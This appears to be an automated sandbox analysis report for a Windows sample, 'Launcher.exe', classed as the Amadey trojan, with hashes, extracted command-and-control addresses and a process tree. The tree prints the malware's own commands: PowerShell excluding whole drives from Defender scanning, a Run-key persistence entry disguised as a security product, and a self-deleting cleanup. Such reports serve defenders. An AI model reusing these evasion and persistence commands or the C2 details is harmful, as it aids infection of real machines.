Analysis

  • max time kernel
    64s
  • max time network
    68s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    04/11/2024, 14:07

General

  • Target

    Launcher.exe

  • Size

    364KB

  • MD5

    93fde4e38a84c83af842f73b176ab8dc

  • SHA1

    e8c55cc160a0a94e404f544b22e38511b9d71da8

  • SHA256

    fb07af2aead3bdf360f555fc872191e43c2f0acbfc9258435f9a30afe272ba03

  • SHA512

    48720aebe2158b8a58fc3431c2e6f68271fbade51303ad9cb5b0493efaec6053ff0c19a898841ef7c57a3c4d042ac8e7157fb3dc79593c1dfcdcf88e1469fdec

  • SSDEEP

    6144:MpS9kEFKbITUvR8cy8dzQ7Lcf3Si96sfO+2RZrTql9unNrkYqliwrqH1JWP6f:Mp8KLBzQ7Lcf3SiQs2FTTql9unNrkvT2

Malware Config

Extracted

Family

amadey

Version

5.03

Botnet

9c0a5d

C2

http://185.208.158.116

http://185.209.162.226

http://zapsnn.com

Attributes
  • install_dir

    cdf9d60151

  • install_file

    Gxtuum.exe

  • strings_key

    5866d84c2de724a41612b3c391bae33f

  • url_paths

    /bVoZEtTa1/index.php

    /bVoZEtTa2/index.php

    /bVoZEtTa3/index.php

rc4.plain

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Start PowerShell.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Executes dropped EXE 10 IoCs
  • Loads dropped DLL 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • System Location Discovery: System Language Discovery 1 TTPs 18 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies system certificate store 2 TTPs 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 6 IoCs
  • Suspicious use of WriteProcessMemory 61 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Launcher.exe
    "C:\Users\Admin\AppData\Local\Temp\Launcher.exe"
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Modifies system certificate store
    • Suspicious use of WriteProcessMemory
    PID:868
    • C:\Users\Admin\AppData\Roaming\services\Launhcer.exe
      "C:\Users\Admin\AppData\Roaming\services\Launhcer.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2708
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "$AdminRightsRequired = $true function Get-Win { while ($true) { # if ($AdminRightsRequired) { # try { Start-Process -FilePath '.\data\Launcher.exe' -Verb RunAs -Wait # break } catch { Write-Host 'Error 0xc0000906' } } else { # break } } } Get-Win"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3816
        • C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe
          "C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe"
          4⤵
          • Checks computer location settings
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:1152
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath $env:ProgramData, $env:AppData, $env:SystemDrive\ "
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1656
          • C:\Users\Admin\AppData\Roaming\services\winrar.exe
            "C:\Users\Admin\AppData\Roaming\services\winrar.exe" x -y -pjryj2023 C:\Users\Admin\AppData\Roaming\services\01 C:\Users\Admin\AppData\Roaming\services
            5⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious use of FindShellTrayWindow
            PID:4448
          • C:\Users\Admin\AppData\Roaming\services\plugin342
            C:\Users\Admin\AppData\Roaming\services\plugin342
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:3128
            • C:\Users\Admin\AppData\Roaming\services\plugin342
              "C:\Users\Admin\AppData\Roaming\services\plugin342"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              PID:4516
            • C:\Windows\SysWOW64\cmd.exe
              cmd.exe /C reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "CrowdstrikeEngine" /t REG_SZ /d "rundll32.exe C:\Users\Admin\AppData\Roaming\CiscoUpdater0009901.dll",EntryPoint /f & exit
              6⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:3396
              • C:\Windows\SysWOW64\reg.exe
                reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "CrowdstrikeEngine" /t REG_SZ /d "rundll32.exe C:\Users\Admin\AppData\Roaming\CiscoUpdater0009901.dll",EntryPoint /f
                7⤵
                • Adds Run key to start application
                • System Location Discovery: System Language Discovery
                PID:4980
          • C:\Users\Admin\AppData\Roaming\services\winrar.exe
            "C:\Users\Admin\AppData\Roaming\services\winrar.exe" x -y -pjryj2023 C:\Users\Admin\AppData\Roaming\services\02 C:\Users\Admin\AppData\Roaming\services\data
            5⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious use of FindShellTrayWindow
            PID:868
          • C:\Users\Admin\AppData\Roaming\services\data\2plugin4325
            C:\Users\Admin\AppData\Roaming\services\data\2plugin4325
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:4324
            • C:\Users\Admin\AppData\Roaming\services\data\2plugin4325
              "C:\Users\Admin\AppData\Roaming\services\data\2plugin4325"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:5040
          • C:\Users\Admin\AppData\Roaming\services\plugin342
            C:\Users\Admin\AppData\Roaming\services\plugin342
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:1140
            • C:\Users\Admin\AppData\Roaming\services\plugin342
              "C:\Users\Admin\AppData\Roaming\services\plugin342"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              PID:1672
            • C:\Windows\SysWOW64\cmd.exe
              cmd.exe /C reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "CrowdstrikeEngine" /t REG_SZ /d "rundll32.exe C:\Users\Admin\AppData\Roaming\CiscoUpdater0009901.dll",EntryPoint /f & exit
              6⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:1652
              • C:\Windows\SysWOW64\reg.exe
                reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "CrowdstrikeEngine" /t REG_SZ /d "rundll32.exe C:\Users\Admin\AppData\Roaming\CiscoUpdater0009901.dll",EntryPoint /f
                7⤵
                • Adds Run key to start application
                • System Location Discovery: System Language Discovery
                PID:3148
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /K rd /s /q "C:\Users\Admin\AppData\Roaming\services" & EXIT
            5⤵
            • System Location Discovery: System Language Discovery
            PID:1656

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ywmpfdmd.wgu.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Roaming\WinRAR\version.dat

    Filesize

    12B

    MD5

    bb123ec0523db1c88b5c3dfea815b701

    SHA1

    950b2c0b8537435b8b96011dfec4c7065def694c

    SHA256

    2b0e5422eb1560b3ef0893132367caabe2bd6d6552f334cf5410c95c78f1b473

    SHA512

    f3fb20b6e38096d05ea8a948c7ecb26d01395c10ab1d2ff6ce54a4fc8ef46bc8a0bdd037f179eaa1947a340e368e95988768da349e1c4ff3a54c7632eb9cbad1

  • C:\Users\Admin\AppData\Roaming\services\01

    Filesize

    5.6MB

    MD5

    5377db404fce684c13e14f5e22e2ffcb

    SHA1

    f23129fba59eec620cef0b5277dcce066f515ca5

    SHA256

    8abec78570a9d71983a87f8f82e50d9e6a2ccd56e39d144b8eda2ffe09a58e6e

    SHA512

    059dac872c1c8d65842b91359a7b840e85e14061f32aacdba0de3e968945bf5d8a36e7184c7c28f10f5fc5ee9a650ab49e61b9554a211123174401294190e04d

  • C:\Users\Admin\AppData\Roaming\services\02

    Filesize

    6.0MB

    MD5

    4317da7f0bb34899a708cbe2dcedaa54

    SHA1

    bef4efd6f1576fc08b63faefe3fb8a60ff127aeb

    SHA256

    72651def1eee171810540cc5b44118692849e22f60e46f1eee67e06063af5aff

    SHA512

    2fefb66930e7efdae48cc5b2a3eca53ebac0ef49225fa7265056537624e34aa38e09d01168aa67a92cdbc50f081b35e9240c56169759d13bb545825196a43bd7

  • C:\Users\Admin\AppData\Roaming\services\HID.DLL

    Filesize

    7.1MB

    MD5

    7a04dcd7388b330f4745f8de2bf9605f

    SHA1

    ec746c2dc9b9f1c7667585a1fdc5769389d07b8b

    SHA256

    6683f3e6c27fd2c204f5c5d9c9e202a50b226258a00ec0f4ed75b046be1c6110

    SHA512

    104609c6b0a3ae8d12369d3c684d698bb009b3e849081be8d3c137d85993ae686e671abf1fa607cdc0b51fe21362fcf71cc1982eac8de31297561811eb19b37b

  • C:\Users\Admin\AppData\Roaming\services\Launhcer.dll

    Filesize

    2KB

    MD5

    ab117f05d16af429ceeb2410593d54df

    SHA1

    a962e8bc68293d8759be561eec09de5170148766

    SHA256

    4daf580ce0f912b8a4f5e56e4721880792a8a4dca68495b5f2aafaf5e6ebad6d

    SHA512

    07ac23a0906f544bd298e1931e4c6237082b8c46be987e62b69c3dc2899fbec2a9fb5eefd1a81eee665f65e42d3fe4c4400501edd66518e79d488e4b52d31ee3

  • C:\Users\Admin\AppData\Roaming\services\Launhcer.exe

    Filesize

    364KB

    MD5

    e5c00b0bc45281666afd14eef04252b2

    SHA1

    3b6eecf8250e88169976a5f866d15c60ee66b758

    SHA256

    542e2ebbded3ef0c43551fb56ce44d4dbb36a507c2a801c0815c79d9f5e0f903

    SHA512

    2bacd4e1c584565dfd5e06e492b0122860bfc3b0cc1543e6baded490535309834e0d5bb760f65dbfb19a9bb0beddb27a216c605bbed828810a480c8cd1fba387

  • C:\Users\Admin\AppData\Roaming\services\Launhcer.exe.manifest

    Filesize

    1KB

    MD5

    f0fc065f7fd974b42093594a58a4baef

    SHA1

    dbf28dd15d4aa338014c9e508a880e893c548d00

    SHA256

    d6e1c130f3c31258b4f6ff2e5d67bb838b65281af397a11d7eb35a7313993693

    SHA512

    8bd26de4f9b8e7b6fe9c42f44b548121d033f27272f1da4c340f81aa5642adc17bb9b092ece12bb8515460b9c432bf3b3b7b70f87d4beb6c491d3d0dfb5b71fe

  • C:\Users\Admin\AppData\Roaming\services\data\2plugin4325

    Filesize

    3.2MB

    MD5

    fd2f2543267e88ee102de87a6385a1b0

    SHA1

    1d23637a34ac33c1f842749877acebd18c70f00b

    SHA256

    3e76a6a04eb32e640a4f2873faf2028703307bb8a2620b94d71c2536b0b6c5fe

    SHA512

    acc5f64688a34482fed7e7d133c435c94df37b0097ebb15c5d1a5631f8101e23cc092a9282f4ff84155c7972009b0b77c23eee38386f56de1e404e1d0e2cddc8

  • C:\Users\Admin\AppData\Roaming\services\data\Launcher.dll

    Filesize

    4KB

    MD5

    782da0b6fb776ba2bba525f767b6e078

    SHA1

    548bb11b03a16d6f27daa99f7ff5ef45862f98fb

    SHA256

    0742c6aab43f9be96d9e03fbee99d5f3bf6cdfddccde3726b61db3f0893d6d8a

    SHA512

    466d26a2203035040b3e8f3e7b9406e4392537d5ee323c44f1f74339dbb39258216ee736002186c361358ceeb0503ed0461e41c15eb5b251d38bb24768958237

  • C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe

    Filesize

    364KB

    MD5

    93fde4e38a84c83af842f73b176ab8dc

    SHA1

    e8c55cc160a0a94e404f544b22e38511b9d71da8

    SHA256

    fb07af2aead3bdf360f555fc872191e43c2f0acbfc9258435f9a30afe272ba03

    SHA512

    48720aebe2158b8a58fc3431c2e6f68271fbade51303ad9cb5b0493efaec6053ff0c19a898841ef7c57a3c4d042ac8e7157fb3dc79593c1dfcdcf88e1469fdec

  • C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe.manifest

    Filesize

    1KB

    MD5

    1b6de83d3f1ccabf195a98a2972c366a

    SHA1

    09f03658306c4078b75fa648d763df9cddd62f23

    SHA256

    e20486518d09caf6778ed0d60aab51bb3c8b1a498fd4ede3c238ee1823676724

    SHA512

    e171a7f2431cfe0d3dfbd73e6ea0fc9bd3e5efefc1fbdeff517f74b9d78679913c4a60c57dde75e4a605c288bc2b87b9bb54b0532e67758dfb4a2ac8aea440ce

  • C:\Users\Admin\AppData\Roaming\services\data\d3d11.dll

    Filesize

    5.7MB

    MD5

    ce00e40cbce6d3267e210f12e4e87a43

    SHA1

    388d00a34f419646a10de6aa028943892a0461dd

    SHA256

    e2cf5cfcb918abd8a8b65b8e1d6090d975560b81a91dfaac3f8e4d4149caeb06

    SHA512

    874049bcd9af9111111f972018fec5598d1e40bf41d9e4ff491c7b5bd730a25775438038a470655852d1eccf0ec9a1389c46f8c8243aa39edf0947244fdf005e

  • C:\Users\Admin\AppData\Roaming\services\plugin342

    Filesize

    2.7MB

    MD5

    a0fab21c52fb92a79bc492d2eb91d1d6

    SHA1

    03d14da347c554669916d60e24bee1b540c2822e

    SHA256

    e10f9d22cdbc39874ce875fd8031c3db26f58daf20ee8ae6a82de9ed2dfc7863

    SHA512

    e37d3d09eef103bfe043c74921296c0b8195a3e43a3801340a9953f44f512e81acbc2051f0305a3a3f41bb98cd4587bb65c3b3a96d702b048199d24a120b446e

  • C:\Users\Admin\AppData\Roaming\services\winrar.exe

    Filesize

    2.1MB

    MD5

    f59f4f7bea12dd7c8d44f0a717c21c8e

    SHA1

    17629ccb3bd555b72a4432876145707613100b3e

    SHA256

    f150b01c1cbc540c880dc00d812bcca1a8abe1166233227d621408f3e75b57d4

    SHA512

    44811f9a5f2917ccd56a7f894157fa305b749ca04903eeaeca493864742e459e0ce640c01c804c266283ce8c3e147c8e6b6cfd6c5cb717e2a374e92c32a63b2c

  • memory/1140-237-0x0000000065000000-0x0000000065726000-memory.dmp

    Filesize

    7.1MB

  • memory/1140-116-0x00000000000C0000-0x0000000000A47000-memory.dmp

    Filesize

    9.5MB

  • memory/1140-239-0x0000000065000000-0x0000000065726000-memory.dmp

    Filesize

    7.1MB

  • memory/1140-240-0x0000000065000000-0x0000000065726000-memory.dmp

    Filesize

    7.1MB

  • memory/1140-238-0x0000000065000000-0x0000000065726000-memory.dmp

    Filesize

    7.1MB

  • memory/1140-242-0x0000000065000000-0x0000000065726000-memory.dmp

    Filesize

    7.1MB

  • memory/1140-245-0x0000000065000000-0x0000000065726000-memory.dmp

    Filesize

    7.1MB

  • memory/1656-71-0x0000000007930000-0x0000000007FAA000-memory.dmp

    Filesize

    6.5MB

  • memory/1656-74-0x0000000007500000-0x000000000750E000-memory.dmp

    Filesize

    56KB

  • memory/1656-69-0x0000000007130000-0x000000000714E000-memory.dmp

    Filesize

    120KB

  • memory/1656-70-0x0000000007190000-0x0000000007233000-memory.dmp

    Filesize

    652KB

  • memory/1656-58-0x0000000007150000-0x0000000007182000-memory.dmp

    Filesize

    200KB

  • memory/1656-72-0x0000000007350000-0x000000000735A000-memory.dmp

    Filesize

    40KB

  • memory/1656-73-0x00000000074D0000-0x00000000074E1000-memory.dmp

    Filesize

    68KB

  • memory/1656-59-0x000000006FE60000-0x000000006FEAC000-memory.dmp

    Filesize

    304KB

  • memory/1656-75-0x0000000007510000-0x0000000007524000-memory.dmp

    Filesize

    80KB

  • memory/1656-76-0x0000000007550000-0x000000000756A000-memory.dmp

    Filesize

    104KB

  • memory/1656-77-0x0000000007540000-0x0000000007548000-memory.dmp

    Filesize

    32KB

  • memory/1672-248-0x0000000001340000-0x00000000013D2000-memory.dmp

    Filesize

    584KB

  • memory/1672-246-0x0000000001340000-0x00000000013D2000-memory.dmp

    Filesize

    584KB

  • memory/1672-241-0x0000000001340000-0x00000000013D2000-memory.dmp

    Filesize

    584KB

  • memory/1672-251-0x0000000001340000-0x00000000013D2000-memory.dmp

    Filesize

    584KB

  • memory/3128-95-0x00000000000C0000-0x0000000000A47000-memory.dmp

    Filesize

    9.5MB

  • memory/3128-124-0x0000000065000000-0x0000000065726000-memory.dmp

    Filesize

    7.1MB

  • memory/3128-122-0x0000000065000000-0x0000000065726000-memory.dmp

    Filesize

    7.1MB

  • memory/3128-123-0x0000000065000000-0x0000000065726000-memory.dmp

    Filesize

    7.1MB

  • memory/3128-127-0x0000000065000000-0x0000000065726000-memory.dmp

    Filesize

    7.1MB

  • memory/3128-129-0x0000000065000000-0x0000000065726000-memory.dmp

    Filesize

    7.1MB

  • memory/3128-125-0x0000000065000000-0x0000000065726000-memory.dmp

    Filesize

    7.1MB

  • memory/3816-41-0x0000000006CB0000-0x0000000006D46000-memory.dmp

    Filesize

    600KB

  • memory/3816-81-0x0000000073520000-0x0000000073CD0000-memory.dmp

    Filesize

    7.7MB

  • memory/3816-21-0x000000007352E000-0x000000007352F000-memory.dmp

    Filesize

    4KB

  • memory/3816-90-0x0000000073520000-0x0000000073CD0000-memory.dmp

    Filesize

    7.7MB

  • memory/3816-42-0x0000000006C10000-0x0000000006C2A000-memory.dmp

    Filesize

    104KB

  • memory/3816-43-0x0000000006C30000-0x0000000006C52000-memory.dmp

    Filesize

    136KB

  • memory/3816-44-0x00000000073A0000-0x0000000007944000-memory.dmp

    Filesize

    5.6MB

  • memory/3816-22-0x00000000045A0000-0x00000000045D6000-memory.dmp

    Filesize

    216KB

  • memory/3816-80-0x000000007352E000-0x000000007352F000-memory.dmp

    Filesize

    4KB

  • memory/3816-40-0x0000000005B60000-0x0000000005BAC000-memory.dmp

    Filesize

    304KB

  • memory/3816-23-0x0000000073520000-0x0000000073CD0000-memory.dmp

    Filesize

    7.7MB

  • memory/3816-24-0x0000000004C10000-0x0000000005238000-memory.dmp

    Filesize

    6.2MB

  • memory/3816-25-0x0000000073520000-0x0000000073CD0000-memory.dmp

    Filesize

    7.7MB

  • memory/3816-26-0x0000000004B50000-0x0000000004B72000-memory.dmp

    Filesize

    136KB

  • memory/3816-27-0x0000000005460000-0x00000000054C6000-memory.dmp

    Filesize

    408KB

  • memory/3816-28-0x00000000054D0000-0x0000000005536000-memory.dmp

    Filesize

    408KB

  • memory/3816-38-0x0000000005640000-0x0000000005994000-memory.dmp

    Filesize

    3.3MB

  • memory/3816-39-0x0000000005B10000-0x0000000005B2E000-memory.dmp

    Filesize

    120KB

  • memory/4324-141-0x0000000068400000-0x00000000689F8000-memory.dmp

    Filesize

    6.0MB

  • memory/4324-143-0x0000000068400000-0x00000000689F8000-memory.dmp

    Filesize

    6.0MB

  • memory/4324-146-0x0000000068400000-0x00000000689F8000-memory.dmp

    Filesize

    6.0MB

  • memory/4324-145-0x0000000068400000-0x00000000689F8000-memory.dmp

    Filesize

    6.0MB

  • memory/4324-118-0x0000000068400000-0x00000000689F8000-memory.dmp

    Filesize

    6.0MB

  • memory/4324-142-0x0000000068400000-0x00000000689F8000-memory.dmp

    Filesize

    6.0MB

  • memory/4324-140-0x0000000068400000-0x00000000689F8000-memory.dmp

    Filesize

    6.0MB

  • memory/4516-135-0x0000000000E10000-0x0000000000EA2000-memory.dmp

    Filesize

    584KB

  • memory/4516-126-0x0000000000E10000-0x0000000000EA2000-memory.dmp

    Filesize

    584KB

  • memory/4516-134-0x0000000000E10000-0x0000000000EA2000-memory.dmp

    Filesize

    584KB

  • memory/4516-132-0x0000000000E10000-0x0000000000EA2000-memory.dmp

    Filesize

    584KB

  • memory/5040-236-0x0000000000900000-0x0000000000D47000-memory.dmp

    Filesize

    4.3MB

  • memory/5040-144-0x0000000000900000-0x0000000000D47000-memory.dmp

    Filesize

    4.3MB

  • memory/5040-150-0x0000000000900000-0x0000000000D47000-memory.dmp

    Filesize

    4.3MB

  • memory/5040-148-0x0000000000900000-0x0000000000D47000-memory.dmp

    Filesize

    4.3MB